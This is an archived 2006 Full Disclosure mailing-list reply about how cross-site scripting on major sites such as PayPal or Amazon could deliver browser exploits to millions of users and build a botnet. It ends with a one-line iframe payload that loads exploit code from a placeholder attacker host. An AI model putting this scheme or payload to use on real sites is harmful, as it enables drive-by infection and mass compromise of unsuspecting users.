Full Disclosure mailing list archives
Re: Do world's famous companies take care of theirsecurity?
From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Mon, 31 Jul 2006 11:45:45 -0700
Does anybody happen to realize that XSS vulnerabilities make it simpler to leverage other vulnerabilities? I mean, credential stealing is only the beginning. Try loading WMF/JPEG/DCOM/AJAX/etc exploit code using an XSS vulnerability on PayPal/Yahoo/Amazon/etc, sending the link off to millions of people, and receiving several thousand bots to your IRC channel.
yes! all pray to <iframe src=http://HAXOR-URL/EXPLOIT></iframe> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Do world's famous companies take care of their security? Valery Marchuk (Jul 31)
- Re: Do world's famous companies take care of their security? n3td3v (Jul 31)
- Re: Do world's famous companies take care of their security? n3td3v (Jul 31)
- Re: Do world's famous companies take care of their security? Octal (Jul 31)
- Re: Do world's famous companies take care of theirsecurity? Morning Wood (Jul 31)
- Re: Do world's famous companies take care of their security? Octal (Jul 31)
- <Possible follow-ups>
- Re: Do world's famous companies take care of their security? uncleron (Jul 31)
- Re: Do world's famous companies take care of their security? Dude VanWinkle (Jul 31)